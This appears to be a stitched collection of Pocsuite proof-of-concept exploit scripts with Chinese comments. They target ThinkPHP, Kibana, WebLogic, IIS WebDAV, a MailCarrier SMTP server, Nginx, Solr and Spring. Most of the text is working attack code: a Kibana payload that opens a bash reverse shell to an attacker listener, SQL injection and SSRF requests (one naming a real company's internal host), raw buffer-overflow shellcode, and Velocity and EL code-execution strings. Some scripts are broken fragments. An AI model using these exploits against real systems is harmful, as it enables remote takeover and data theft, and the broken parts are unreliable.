    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        self.url=self.url.strip()
        payloads = [
            '/?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
            '/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
            '/?s=index/\\think\\Request/input&filter=phpinfo&data=1']
        for payload in payloads:
            newurl = self.url.strip() + payload
            try:
                r = requests.get(newurl,timeout=5)
                if "PHP Version" in r.text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = newurl
                    break
            except Exception as e:
                return self.parse_output(result)
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#! python3
"""

@FileName: elasticsearch_kibana_rce.py
@Author: dylan
@software: PyCharm
@Datetime: 2019-10-20 15:23:54

"""
import re
from collections import OrderedDict
import json
import urllib.parse
from bs4 import BeautifulSoup
from pocsuite3.api import Output, POCBase, register_poc, requests, OptString, logger


class DemoPOC(POCBase):
    vulID = "CVE-2019-7609"  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = "3.0"  # 默认为1
    author = "dylan"  # PoC作者的大名
    vulDate = "2019/10/20"  # 漏洞公开的时间,不知道就写今天
    createDate = "2019/10/20"  # 编写 PoC 的日期
    updateDate = "2019/10/20"  # PoC 更新的时间,默认和编写时间一样
    references = ["https://github.com/jas502n/kibana-RCE"]  # 漏洞地址来源,0day不用写
    name = "elasticsearch_kibana_rce"  # PoC 名称
    appPowerLink = ""  # 漏洞厂商主页地址
    appName = "elasticsearch_kibana"  # 漏洞应用名称
    appVersion = "Kibana < 6.6.1,Kibana < 5.6.15"  # 漏洞影响版本
    vulType = "rce"  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = """
        Need Timelion And Canvas
    """  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    pocDesc = """
    pocsuite -r "elasticsearch_kibana_rce.py" -u 目标ip --ncip "监听ip" --ncport "监听端口"

    pocsuite -r "elasticsearch_kibana_rce.py" -u https://192.168.1.1 --ncip "192.168.1.1" --ncport "12345"
    """

    def _options(self):
        o = OrderedDict()
        o["ncip"] = OptString('', description='请输入监听服务器IP', require=True)
        o["ncport"] = OptString('', description='请输入监听服务器端口', require=True)
        return o

    def _verify(self):
        # 验证代码
        result = {}
        output = Output(self)
        kibana_path = self.url+"/app/kibana"
        path1 = self.url + "/app/timelion"
        print(path1)
        path2 = self.url + "/api/timelion/run"
        payload = {
            "sheet": [
                ".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"bash -i >& "
                "/dev/tcp/" + self.get_option("ncip") + "/" + self.get_option(
                    "ncport") + " 0>&1\");process.exit()//')\n.props("
                                "label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')"],
            "time": {"from": "now-15m", "to": "now", "mode": "quick", "interval": "auto",
                     "timezone": "Asia/Shanghai"}
        }
        resp = requests.get(kibana_path, verify=False, timeout=20)
        kbn_version = ''
        try:
            kbn_version = resp.headers['kbn-version']
        except Exception as e:
            logger.info(e)

        header = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0",
            'Accept': 'application/json, text/plain, */*',
            "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            'Connection': 'close',
            'kbn-version': kbn_version,
            'Content-Type': 'application/json;charset=UTF-8'
        }

        respose2 = requests.post(path2, headers=header, data=json.dumps(payload), verify=False, timeout=30)
        # print(respose2.status_code)
        if respose2.status_code == 200 and 'invokeTime' in respose2.text:  # result是返回结果
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Referer'] = ""
        return self.parse_output(result)

    def _attack(self):
        # 攻击代码
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("target is not vulnerable")
        return output


# 注册 DemoPOC 类
register_poc(DemoPOC)


#!/usr/bin/env python
# coding: utf-8
import re
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['kenan']
    vulDate = ''
    createDate = '2016-06-06'
    updateDate = '2016-06-06'
    references = ['http://www.seebug.org/vuldb/ssvid-']
    name = ''
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = ''
    desc = '''
    '''
    samples = ['']
    install_requires = ['']
    #请尽量不要使用第三方库，必要时参考 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明 填写该字段

    def _attack(self):
        result = {}
        #Write your code here
        vulurl = "%s" % self.url
        payload = "/?m=info.detail&id=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
        resp = req.get(vulurl+ payload)
        re_result = re.findall(r'~~~(.*?)~~~', resp.content, re.S|re.I)
        vulurl1 = "%s/?m=city.getSearch&index=xx" % self.url
        payload1 = {"key":"xxx' AND (SELECT 7359 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xx'='xx"}
        resp1 = req.post(vulurl,data =payload1)
        re_result1 = re.findall(r'~~~(.*?)~~~', resp1.content, re.S|re.I)
        if re_result  :
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload
            return self.parse_output(result)
        if re_result1 :
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl1
            result['VerifyInfo']['Payload'] = payload1
            return self.parse_output(result)

    def _verify(self):
        result = {}
        return self._attack()

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.lib.core.enums import CUSTOM_LOGGING
from pocsuite.lib.core.log import LOGGER
from pocsuite.lib.core.poc import POCBase, Output
from pocsuite.utils import register
import requests

_print2 = lambda msg: LOGGER.log(CUSTOM_LOGGING.SYSINFO, msg)


class SSRFPOC(POCBase):
    vulID = 'WooYun-2015-137807'  # ssvid
    version = '???'
    author = ['jsj']
    vulDate = '2018-05-22'
    createDate = '2018-05-22'
    updateDate = '2018-05-22'
    references = ['???']
    name = 'SSRF VUL'
    appPowerLink = '???'
    appName = 'BEA WebLogic Server'
    appVersion = '???'
    vulType = '设计缺陷/逻辑错误'
    desc = '''
       中国平安直通保险主站存在SSRF漏洞，导致内网主机探测和端口扫描
    '''

    def base(self):

        info = {"urls": []}
        vul_url = self.url + "/uddiexplorer/SearchPublicRegistries.jsp"
        ssrf_url = self.url + "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://pa18-padwebDMZ9115.instance.paic.com.cn:30351&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search"
        url_p_22 = self.url + "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://pa18-padwebDMZ9115.instance.paic.com.cn:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search"
        url_p_123 = self.url + "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://pa18-padwebDMZ9115.instance.paic.com.cn:123&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search"

        index_page = requests.get(self.url)
        _print2("{} <-- {}".format(index_page.status_code, index_page.url))
        if index_page.status_code != 200:
            return "Can not connect the tartget!"

        vul_page = requests.get(vul_url, cookies=index_page.cookies, headers=index_page.headers)
        _print2("{} <-- {}".format(vul_page.status_code, vul_page.url))
        if vul_page.status_code == 200:
            info["urls"].append(vul_page.url)
        #
        # port 30351
        #
        ssrf_page = requests.get(ssrf_url, cookies=index_page.cookies, headers=index_page.headers)
        _print2("{} <-- {}".format(ssrf_page.status_code, ssrf_page.url))
        if ssrf_page.status_code == 200:
            info["urls"].append(ssrf_page.url)
        #
        # port 22
        #
        page_22 = requests.get(url_p_22, cookies=index_page.cookies, headers=index_page.headers)
        _print2("{} <-- {}".format(page_22.status_code, page_22.url))
        if page_22.status_code == 200:
            info["urls"].append(page_22.url)
        #
        # port 123
        #
        page_123 = requests.get(url_p_123, cookies=index_page.cookies, headers=index_page.headers)
        _print2("{} <-- {}".format(page_123.status_code, page_123.url))
        if page_123.status_code == 200:
            info["urls"].append(page_123.url)
        if info["urls"]:
            return info
        else:
            return "There is not VUL on the target."

    def _attack(self):
        _print2("attack ...")
        result = Output(self)
        info = self.base()
        if isinstance(info, dict):
            result.success({"AttackInfo": info})
        else:
            LOGGER.log(CUSTOM_LOGGING.WARNING, info)
            result.fail(info)
        return result

    def _verify(self):
        _print2("verify ...")
        result = Output(self)
        info = self.base()
        if isinstance(info, dict):
            result.success({"VerifyInfo": info})
        else:
            LOGGER.log(CUSTOM_LOGGING.WARNING, info)
            result.fail(info)
        return result


register(SSRFPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

class IiswebdavPOC(POCBase):
    vulID = '15'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2017-07-11' #漏洞公开的时间,不知道就写今天

    author = 'wolf@YSRC' #  PoC作者的大名
    createDate = '2017-07-11'# 编写 PoC 的日期
    updateDate = '2017-07-11'# PoC 更新的时间,默认和编写时间一样
    references = 'http://www.cnblogs.com/cnhacker/p/6999102.html'# 漏洞地址来源,0day不用写
    name = 'iis webdav PUT getshell'# PoC 名称
    appPowerLink = 'https://www.iis.net/'# 漏洞厂商主页地址
    appName = 'iis'# 漏洞应用名称
    appVersion = 'iis 6.0'# 漏洞影响版本
    vulType = 'file-upload'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        iis6.0 PUT写文件漏洞
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重" #严重,高危,中危,低危

    #验证漏洞 pocsuite -r 15-WebDav-getshell.py -u 1.1.1.1 --verify
    def _verify(self):
        #定义返回结果
        result = {}
        #获取漏洞url
        vul_url = '%s' % self.url

        import socket
        import time
        import urllib2

        try:
            socket.setdefaulttimeout(5)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            flag = "PUT /vultest.txt HTTP/1.1\r\nHost: %s:80\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n" % vul_url
            s.send(flag)
            time.sleep(1)
            data = s.recv(1024)
            s.close()
            if 'PUT' in data:
                url = vul_url + '/vultest.txt'
                request = urllib2.Request(url)
                res_html = urllib2.urlopen(request, timeout=timeout).read(204800)
                if 'xxscan0' in res_html:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = url
                    result['VerifyInfo']['Payload'] = flag
            else:
                #print u'\n【不存在漏洞】 ' + url
                pass
        except:
            # return url
            pass
        print('[+]15 poc done')
        return self.save_output(result)

    #漏洞攻击
    def _attack(self):
        result = {}
        # 攻击代码
        return self._verify()

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(IiswebdavPOC)






#!/usr/bin/env python
# coding: utf-8
import re
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class TestPOC(POCBase):
    vulID = '0'
    version = '1.0'
    author = 'hancool'
    vulDate = '2014-6-1'
    createDate = '2019-5-30'
    updateDate = '2019-5-30'
    references = [
        'https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html',
    ]
    name = 'WebLogic SSRF And XSS(CVE-2014-4241, CVE-2014-4210, CVE-2014-4242)'
    appPowerLink = 'https://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html'
    appName = 'WebLogic'
    appVersion = 'All'
    vulType = VUL_TYPE.XSS
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
    Universal Description Discovery and Integration (UDDI) functionality often lurks unlinked but externally accessible on WebLogic servers. 
    It’s trivially discoverable using fuzz lists such as Weblogic.fuzz.txt and was, until recently, 
    vulnerable to Cross Site Scripting (XSS) and Server Side Request Forgery (SSRF).
    '''

    def _verify(self):
        def ssrf(target):
            # {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
            proxies = None
            headers = {
                'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)', 'Connection': 'close'}
            timeout = 5
            ports_ssrf = '21,22,23,80,443,1521,3306,3389,8080,7001,17001'
            status, ssrf_ip, results = False, '', []
            try:
                s = req.Session()
                r_test = s.get('{}/uddiexplorer/SetupUDDIExplorer.jsp'.format(target),
                               headers=headers, timeout=timeout, proxies=proxies)
                if r_test.status_code == 200:
                    regex = 'http://(.*)/uddi/uddilistener'
                    ip_ssrf = re.findall(regex, r_test.content)[0]
                    if ip_ssrf != '':
                        ssrf_ip = ip_ssrf.split(':')[0]
                        for port in ports_ssrf.split(','):
                            try:
                                url = '{}/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{}:{}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search'.format(
                                    target, ssrf_ip, port)
                                r = s.get(url, headers=headers,
                                          timeout=timeout, proxies=proxies)
                                re_sult4 = re.findall(
                                    'IO Exception on sendMessage', r.content)
                                # 如果是404页面，则说明已删除了该页面，不存在漏洞利用，结束检测
                                if r.status_code == 404 or len(re_sult4) != 0:
                                    break
                                re_sult1 = re.findall(
                                    'weblogic.uddi.client.structures.exception.XML_SoapException', r.content)
                                re_sult2 = re.findall(
                                    'No route to host', r.content)
                                re_sult3 = re.findall(
                                    'but could not connect', r.content)
                                if len(re_sult1) != 0 and len(re_sult2) == 0 and len(re_sult3) == 0:
                                    results.append(port)
                                    status = True
                            # 如果一个端口发生超时则跳过该端口继续：
                            except req.exceptions.ReadTimeout:
                                continue
                            except req.exceptions.ConnectionError:
                                continue
            except Exception as ex:
                pass
                # raise(ex)

            return (status, ssrf_ip, ','.join(results))

        '''
        verify:
        '''
        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [7001, 17001, 27001]
        for port in ports:
            uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port))
            status, ssrf_ip, msg = ssrf(uri)
            if status:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = uri
                result['extra'] = {}
                result['extra']['evidence'] = 'opend ports -> {}'.format(msg)
                break

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(TestPOC)



#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import struct
import socket, re


def make_overflow_dummy(overflow_len, retaddr):
    return 'A' * overflow_len + str(struct.pack('<L', retaddr))


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sc2 = "\xEB"
sc2 += "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
sc2 += "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
sc2 += "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
sc2 += "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
sc2 += "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
sc2 += "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
sc2 += "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
sc2 += "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
sc2 += "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
sc2 += "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
sc2 += "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
sc2 += "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
sc2 += "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
sc2 += "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
sc2 += "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
sc2 += "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
sc2 += "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
sc2 += "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
sc2 += "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
sc2 += "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
sc2 += "\x58\x68\x61\x63\x6B\x90"
buffer = make_overflow_dummy(5097, 0x7d17dd13) + '\x41' * 32 + sc2


def poc(url):
    ip = re.findall(r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b", url)
    try:
        s.connect((ip[0], 25))
        s.send('EHLO ' + buffer + '\r\n')
        data = s.recv(1024)
        s.close()
        return True
    except:
        return False


class TestPOC(POCBase):
    name = 'MailCarrier SMTP服务程序远程缓冲区溢出漏洞'
    vulID = 'CVE-2004-1638'
    author = ['sxd']
    vulType = 'buffer-overflow'
    version = '1.0'  # default version: 1.0
    references = ['http://www.nsfocus.net/vulndb/7052']
    desc = '''
		   MailCarrier SMTP server是一款功能强大的SMTP服务程序。

MailCarrier SMTP server对EHLO/HELO命令处理不正确，远程攻击者可以利用这个漏洞对服务进程进行缓冲区溢出，可能以进程权限执行任意指令。

提交包含超长参数的EHLO/HELO命令，可触发缓冲区溢出，精心构建提交数据可能以进程权限执行任意指令。
		   '''
    vulDate = '2020-03-30'
    createDate = '2020-03-30'
    updateDate = '2020-03-30'
    appName = 'MailCarrier'
    appVersion = 'TABS LABORATORIES MailCarrier 2.51'
    appPowerLink = ''
    samples = ['struct', "socket"]

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + ' MailCarrier SMTP服务程序远程缓冲区溢出漏洞' + ' is exist!'
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

class NginxPOC(POCBase):
    vulID = '49'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2018-08-20' #漏洞公开的时间,不知道就写今天

    author = 'arr0w1' #  PoC作者的大名
    createDate = '2018-08-20'# 编写 PoC 的日期
    updateDate = '2018-08-20'# PoC 更新的时间,默认和编写时间一样
    references = ['']# 漏洞地址来源,0day不用写
    name = 'Nginx Remote Integer Overflow Vulnerability'# PoC 名称
    appPowerLink = ''# 漏洞厂商主页地址
    appName = 'nginx'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'Integer Overflows'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Nginx 整数溢出
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"中危" #严重,高危,中危,低危

    def _verify(self):
        #定义返回结果
        result = {}
        #获取漏洞url
        url = '%s' % self.url
        block_str = ['#', '&', ';', '`', '|', '*', '~', '<', '>', '^', '(', ')', '[', ']', '{', '}', '$', '\\', '\'',
                     '\"', '%']
        for str in block_str:
            url = url.replace(str, "")

        #如果设置端口则取端口,没有设置则为默认端口
        import os, commands
        print('[*]Testing for: ' + url)
        
        cmd1 = 'curl -I ' + url + '--connect-timeout 5'
        try:
            os.popen(cmd1)
            os.popen(cmd1)
            re1 = commands.getoutput(cmd1).split('\n')
         
            hit = False
            has_x_proxy_cache = False
            img_len = 0
         
            for i in range(0,len(re1)):
                # print re1[i]
                if 'X-Proxy-Cache' in re1[i]:
                    has_x_proxy_cache = True
                    if 'HIT' in re1[i]:
                        hit = True
         
                if 'Content-Length' in re1[i]:
                    img_len = int(re1[i].split(' ')[1])
         
            if has_x_proxy_cache:
                if hit:

                    len1 = img_len + 600
                    len2 = 0x8000000000000000 - len1
         
                    cmd2 = 'curl -i ' + url + ' -r -' + str(len1) + ',-' + str(len2) + '--connect-timeout 3'
                    re2 = commands.getoutput(cmd2).split('\n')
                    vul = False
                    for i in range(0,len(re2)):
         
                        if 'KEY' in re2[i]:
                            result['VerifyInfo'] = {}
                            result['VerifyInfo']['URL'] = url
                            result['VerifyInfo']['Payload'] = url
                            vul = True
         
                    if not vul:
                        print('[-]Can not find the vuln.')
                else:
                    print('[-]The X-Proxy-Cache is MISS.')
                    print('[-]Can not find the vuln.')
            else:
                print('[-]The header without X-Proxy-Cache.')
                print('[-]Can not find the vuln.')
        except Exception as e:
            # return host
            print(str(e))
       
        return self.save_output(result)

    #漏洞攻击
    def _attack(self):
        result = {}
        # 攻击代码
        return self._verify()

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(NginxPOC)





#!/usr/bin/env python
# coding: utf-8
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
import json


class TestPOC(POCBase):
    vulID = ''
    version = '1'
    author = 'jerome'
    vulDate = '2019-12-25'
    createDate = '2020-2-16'
    updateDate = '2020-2-16'
    references = [
        'hhttps://github.com/vulhub/vulhub/blob/master/solr/CVE-2019-17558/README.zh-cn.md']
    name = 'Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)'
    appPowerLink = 'https://issues.apache.org/jira/browse/SOLR-13971'
    appName = 'Solr'
    appVersion = '< 8.4'
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
        Apache Solr 是一个开源的搜索服务器。在其 5.0.0 到 8.3.1版本中，用户可以注入自定义模板，通过Velocity模板语言执行任意命令。
    '''

    def _verify(self):
        result = {}

        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [8983]
        for port in ports:
            target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
            # 获取目标系统任意核心
            target1 = target + "/solr/admin/cores?indexInfo=false&wt=json"
            headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:73.0) Gecko/20100101 Firefox/73.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                       "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": self.url, "Upgrade-Insecure-Requests": "1"}
            res1 = req.get(target1, headers=headers)
            core = json.loads(res1.content.decode())
            core2 = core['status'].keys()
            core3 = list(core2)[0]

            # 修改core下的配置文件,开启params.resource.loader.enabled
            target2 = target + "/solr/" + core3 + "/config"
            post_json = {"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity",
                                                        "params.resource.loader.enabled": "true", "solr.resource.loader.enabled": "true", "startup": "lazy", "template.base.dir": ""}}
            res2 = req.post(target2, headers=headers, json=post_json)

            # 开启后，直接Get 访问（带入表达式）进行 远程代码命令执行
            target3 = target + "/solr/" + core3 + \
                "/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27echo%20d0xdeadbeaf%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
            response = req.get(target3, headers=headers)
            if response and response.status_code == 200 and "0xdeadbeaf" in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = '{}:{}'.format(
                    pr.hostname, port)
                break
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(TestPOC)



#!/usr/bin/python
# -*- coding: utf-8 -*-
import re
# from pocsuite.api.request import req #用法和 requests 完全相同
# from pocsuite.api.poc import register
# from pocsuite.api.poc import Output, POCBase
import requests as req
from pocsuite3.api import POCBase, Output, register_poc as register

headers = {'user-agent': 'ceshi/0.0.1', 'content-type': 'text/xml'}
# poc_str = '''?message=${applicationScope}'''
poc_str = '''?message=${"aaa".replace('a','b')}'''


def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += poc_str
    try:
        res = req.get(url, verify=False, timeout=5, headers=headers)
        response = res.text
    except Exception:
        response = ""
    return response


class TestPOC(POCBase):
    name = 'Spring Framework_RCE_CVE-2011-2730'
    vulID = 'CVE-2011-2730'  # https://www.seebug.org/vuldb/ssvid-20927
    author = ['debug']
    vulType = 'RCE'  # EL表达式执行
    version = '1.0'  # default version: 1.0
    references = ['https://www.secpulse.com/archives/6064.html']
    desc = '''
		   这个漏洞的形成，是因为在早于JSP2.0的版本上，由于没有EL表达式的支持，
           Spring标签为了兼容这部分版本，Spring的一部分标签独立于Servlet/JSP容器添加了对EL表达式的支持。
           这样做引起了一个问题，就是当这部分标签在支持EL表达式的容器中运行的时候，
           Spring标签的属性会被当做EL表达式执行两次，第一次是被容器当做EL执行，第二次是被Spring标签自身执行。
           所以，如果攻击者可以控制标签属性的内容，就可以执行自己提交的EL表达式，会造成信息泄露、代码执行等风险。
		   '''
    vulDate = '2020-02-7'
    createDate = '2020-02-7'
    updateDate = '2020-02-7'
    appName = 'Spring Framework'
    appVersion = '3.0.*,2.5.1 to 2.5.7'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if 'bbb' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + 'Spring Framework_RCE_CVE-2011-2730' + ' is exist!'
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

